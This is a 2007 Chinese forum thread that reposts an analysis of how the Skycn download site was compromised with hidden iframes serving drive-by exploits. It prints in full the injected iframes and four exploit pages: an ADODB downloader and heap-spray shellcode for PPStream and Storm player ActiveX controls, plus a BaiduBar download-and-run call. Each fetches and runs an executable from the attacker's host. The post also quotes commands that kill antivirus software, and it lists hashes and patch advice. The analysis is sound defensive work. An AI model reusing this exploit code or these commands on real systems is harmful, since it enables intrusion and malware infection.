神啊!救救我吧 发表于 2007-10-7 16:16:38

天空软件站被挂马的幕后及Monyer的分析

    天空软件站是中国最大的软件下载站之一,如今它被挂马了,那么想必已经有几千万人中招了。Monyer并不是危言耸听,下面的分析将证明这不是个笑话。
    今天偶尔上天空看我的UDisk时(重要提醒,天空有病毒不要打开,晕了!),发现Maxthon居然弹出程序运行警告,提示我在c盘下有个c.exe文件要运行,不知道其他人遇到这种情况怎么想,反正从我电脑上出现便成了一件恐怖的事情。看了看任务管理器,内存已经增加了几百兆,很显然被溢出了。再看看C盘的根目录,一个c.exe文件正躺在那里(这说明病毒文件还没有运行,如果运行了,估计你就什么都看不到了。)。于是便开始了以下寻马之旅。
http://www.chinakb.org/images/lz308-3/attachimg.gif
   通过对天空站的分析,被挂马的页面仅存在于软件下载页面。再通过对加进的javascript和iframe的排除,最后落定被插入的恶意代码为:
<iframe name=import_frame width=1height=1 src=http://iplog.skycn.com/wherefrom.php?id=32336frameborder=no></iframe>
它将框架的宽高设为1像素即肉眼不可见。下载whereform.php文件发现里面有另外的代码:
<iframe src=http://www.ip17173.cn/index.html?419891509 width=100 height=0></iframe>
又一个框架,直接访问将看到两个计数器,挺有意思
http://www.chinakb.org/images/lz308-3/attachimg.gif
继续下载ip17173.cn这个站点上的index.html文件打开,里面是一堆加密的javascript代码,这是件好事情——小偷偷东西通常都把脸蒙起来。
简单看了一下,虽然js被加密得面目全非,但好在解密函数还在,那么一切都变得简单,将document.write换成alert即可。运行一下index.html,弹出第二个alert窗口便是木马的所在了
个iframe框架,看来应该对应9个不同的木马哦。用flashget一齐下载,发现有效的仅是vip1.htm~vip4.htm这四个页面,估计剩下的是预留出来的吧。
对这四个页面依次做代码分析便有些冒冷汗了。以下是分析结果

http://www.ip17173.cn/vip1.htm   MS-06014   down.exe   c:\1.exe
<script>url2="http://www.ip17173.cn/down.exe";url1="http://www.ip17173.cn/run.js";try{varado=(document.createElement("object"));ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");varxml=ado.CreateObject("Microsoft.XML"+"HTTP","");varas=ado.createobject("Adodb.Stream","");xml.Open("GET",url1,0);xml.Send();as.type=1;as.open();as.write(xml.responseBody);path1="..//ntuser.js";as.savetofile(path1,2);as.close();xml.Open("GET",url2,0);xml.Send();as.type=1;as.open();as.write(xml.responseBody);path2="C:\\1.exe";as.savetofile(path2,2);as.close();varshell=ado.createobject("Shell.Application","");shell.shellExecute(path1,"","","open",0);}catch(e){};</script><body>查无此页<html>
http://www.ip17173.cn/vip2.htm   ppstream    down.exe   c:\c.exe
<html><body><objectid="pingfan"classid="clsid:5EC7C511-CD0F-42E6-830C-1BD9882F3458"></object><script>varshellcode=unescape("%u00E8%u0000%u6A00%uEB03%u7E21%uE2D8%u9873%u8AFE%u8E0E%u0E4E%u55EC%u4C52%u4F4D%u004E%u3600%u2F1A%u6370%u5C3A%u2E63%u7865%u0065%u5F59%u67AF%uA164%u0030%u408B%u8B0C%u1C70%u8BAD%u0868%u8B51%u3C75%u748B%u782E%uF503%u8B56%u2076%uF503%uC933%u4149%u03AD%u33C5%u0FDB%u10BE%uF238%u0874%uCBC1%u030D%u40DA%uF1EB%u1F3B%uE775%u8B5E%u245E%uDD03%u8B66%u4B0C%u5E8B%u031C%u8BDD%u8B04%uC503%u59AB%uBCE2%u0F8B%uF980%u7463%u570A%uD0FF%uAF95%u6AAF%uEB01%u52AC%u5752%u8F8D%u10DB%u0040%uE981%u104E%u0040%u5251%uD0FF%u016A%uFF57%uEC57%u57FF%u90E8%u7468%u7074%u2F3A%u772F%u7777%u692E%u3170%u3137%u3337%u632E%u2F6E%u6F64%u6E77%u652E%u6578");bigblock=unescape("%u9090");headersize= 20;slackspace = headersize+shellcode.length;while ( bigblock.length< slackspace ) bigblock+=bigblock;fillblock = bigblock.substring(0,slackspace);block=bigblock.substring(0, bigblock.length-slackspace);while(block.length+ slackspace < 0x40000) block =block+ block + fillblock;memory =new Array();;;;memory;for (x=0; x<400;x++) memory = block +shellcode;var buffer ='\x0a';while(buffer.length < 500) buffer+='\x0a\x0a\x0a\x0a';pingfan.Logo=buffer;</script></body></html>
http://www.ip17173.cn/vip3.htm   暴风      down.exe   c:\u.exe
<html>
<object classid="clsid:6BE52E1D-E586-474f-A6E2-1A85A9B4D9FB" id='target'></object>
<body>
<SCRIPT language="javascript">
varshellcode=unescape("%u9090%u9090%uEFE9%u0000%u5A00%uA164%u0030%u0000%u408B%u8B0C%u1C70%u8BAD%u0840%uD88B%u738B%u8B3C%u1E74%u0378%u8BF3%u207E%uFB03%u4E8B%u3314%u56ED%u5157%u3F8B%uFB03%uF28B%u0E6A%uF359%u74A6%u5908%u835F%u04C7%uE245%u59E9%u5E5F%uCD8B%u468B%u0324%uD1C3%u03E1%u33C1%u66C9%u088B%u468B%u031C%uC1C3%u02E1%uC103%u008B%uC303%uFA8B%uF78B%uC683%u8B0E%u6AD0%u5904%u6AE8%u0000%u8300%u0DC6%u5652%u57FF%u5AFC%uD88B%u016A%uE859%u0057%u0000%uC683%u5613%u8046%u803E%uFA75%u3680%u5E80%uEC83%u8B40%uC7DC%u6303%u646D%u4320%u4343%u6643%u03C7%u632F%u4343%u03C6%u4320%u206A%uFF53%uEC57%u04C7%u5C03%u2E61%uC765%u0344%u7804%u0065%u3300%u50C0%u5350%u5056%u57FF%u8BFC%u6ADC%u5300%u57FF%u68F0%u2451%u0040%uFF58%u33D0%uACC0%uC085%uF975%u5251%u5356%uD2FF%u595A%uE2AB%u33EE%uC3C0%u0CE8%uFFFF%u47FF%u7465%u7250%u636F%u6441%u7264%u7365%u0073%u6547%u5374%u7379%u6574%u446D%u7269%u6365%u6F74%u7972%u0041%u6957%u456E%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4C00%u616F%u4C64%u6269%u6172%u7972%u0041%u7275%u6D6C%u6E6F%u5500%u4C52%u6F44%u6E77%u6F6C%u6461%u6F54%u6946%u656C%u0041%u7468%u7074%u2F3A%u772F%u7777%u692E%u3170%u3137%u3337%u632E%u2F6E%u6F64%u6E77%u652E%u6578");
</script>
<SCRIPT language="javascript">
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<300; x++) memory = block + shellcode;
var buffer = '';
while (buffer.length < 4057) buffer+='\x0a\x0a\x0a\x0a';
buffer+='\x0a';
buffer+='\x0a';
buffer+='\x0a';
buffer+='\x0a\x0a\x0a\x0a';
buffer+='\x0a\x0a\x0a\x0a';
target.rawParse(buffer);
</script>
</body>
</html>
http://www.ip17173.cn/vip4.htm   BaiDuBar      calc.cab       down.exe
<script>
function DowndloadCalcAndRun()
{
com.DloadDS("http://www.ip17173.cn/calc.cab", "down.exe", 00);
}
</script>
</head>
<OBJECT ID = "com" CLASSID = "CLSID:{A7F05EE4-0426-454F-8013-C41E3596E9E9}">
</OBJECT>
<script>
DowndloadCalcAndRun()
</script>
<body>欢迎使用<html>
4个溢出漏洞,在前几天还有3个是0day!
一个是ms-06014漏洞,会将其站点的down.exe文件保存到c:\1.exe并运行
一个是ppstream堆栈溢出,将同样文件保存到c:\c.exe并运行
一个是暴风影音溢出漏洞,保存到c:\u.exe并运行
一个是baidubar的溢出漏洞,将calc.cab 保存到down.exe并运行
(这些文件运行后会自我删除,然后关闭杀毒软件,并自动下载其他木马或病毒。)
其中ppstream直到如今仍没有官方补丁。
down.exe文件一看名便知是个下载者了,下载下来传到virscan.org不禁又汗然一把
AVG、巴斯基、江民瑞星金山三大支柱、诺顿、趋势,全部开绿灯。即使熊猫来一个suspiciousfile,也顶多因为其是fsg2.0壳而报个可疑文件,这意味着它是不会主动删除的。麦咖啡虽然给出个pws,但也仅仅是个low的风险等级。所以几乎所有市面上常见的杀毒软件全部“罢工”。
down.exe会下载21个文件。
http://www.ip17173.cn/down/1.exe - 20.exe、down.exe
分别保存到C:\Program Files\Internet Explorer\1.exe - 20.exe、down.exe 运行
还会执行
cmd /c taskkill /im 360safe.exe /f
cmd /c date 2000-01-01

然后还有一个删除自身的批处理。

还有其他的比如放到启动项,改名字什么的。
感谢鬼仔提供信息!

神啊!救救我吧 发表于 2007-10-7 16:17:40

第二次下载的16个病毒文件为(另外值得一提的是antivir小红伞对包括down.exe在内的16个病毒全部通杀,而它是款免费杀毒软件,可以与部分系统杀毒软件兼容):
1.exe tr/dropper.gen
UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo
md5:D92BF450DA49DB121009F94E1321EDF4
2.exe tr/dropper.gen
UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo
md5:E6D8CCC8AD8BBEB18652D432BF4A13BA
3.exe tr/dropper.gen
UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo
md5:362D6904DE8D8111E1BD20BA5320E7FA
4.exe tr/dropper.gen
UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo
md5:23DF9595AA8F10EB8AC850A5ACFAB791
6.exe tr/dropper.gen
UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo
md5:FEACB467E170BAD60ECB209106402228
7.exe Win32.PSWTroj.OnLineGames.dz.163840
nSPack 2.1 - 2.5 -> North Star/Liu Xing Ping
md5:7BD941FA726E9CFB30A68F7768080B04
8.exe tr/dropper.gen
UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo
md5:BD618C1C29BC1C7CB69AEA2BA49D7C45
9.exe suspicious file
Upack 0.3.9 beta2s -> Dwing
md5:6DC4A1336F4B0557EAFE3E3247F3C6FD
10.exe tr/dropper.gen
Microsoft Visual C++ v6.0 DLL *
md5:50DF0549331035B6159DD7F2BD3947A6
11.exe tr/dropper.gen
UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo
md5:A33527DAE1C4C541609D4FECFF63A0C9
13.exe tr/dropper.gen
UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo
md5:39CC71D365556C92EEF065169ED75148
15.exe suspicious file
Upack 0.3.9 beta2s -> Dwing
md5:1E96067D3C6A25BFF59AD76C03C2A565
16.exe suspicious file
Upack 0.3.9 beta2s -> Dwing
md5:73E0B9D28014C84675BEF3343409EDB2
17.exe Win32.PSWTroj.OnLineGames.dz.163840
nSPack 2.1 - 2.5 -> North Star/Liu Xing Ping
md5:477927E9679924CEFCF8BD95DF2BA71D
18.exe Win32.PSWTroj.OnLineGames.dz.163840
nSPack 2.1 - 2.5 -> North Star/Liu Xing Ping
md5:A2C87EE4059B2145DCA8CC7CF9692329
5.exe          cannot down
12.exe         cannot down
14.exe         cannot down
19.exe         cannot down
20.exe         cannot down
针对以上四个溢出,Monyer的解决办法如下:
下载补丁修复ms06014漏洞,将baidubar和暴风升级
而pps麻烦些——删除注册表的clasid:{20C2C286-BDE8-441B-B73D-AFA22D914DA5}以及{5EC7C511-CD0F-42E6-830C-1BD9882F3458}直到官方给出办法。
至于天空,等官方出公告再上吧,小心湿鞋!这么大的站点被人入侵一次也不容易!
最后看一下该马的相关文件,挺壮观吧

Monyer!   2007-10-04 02:35
1.jpg (90.61 KB)
2007-10-7 15:40

2.jpg (6.82 KB)
2007-10-7 15:40

3.jpg (268.66 KB)
2007-10-7 15:40

4.jpg (39.38 KB)
2007-10-7 15:40

5.jpg (294.46 KB)
2007-10-7 15:40

6.jpg (197.03 KB)
2007-10-7 15:40

7.jpg (47.09 KB)
2007-10-7 15:40

胸毛着火了 发表于 2007-10-7 16:21:41

看了那么多,是中木马的意思吧。早说嘛。。。
页: [1]
查看完整版本: 天空软件站被挂马的幕后及Monyer的分析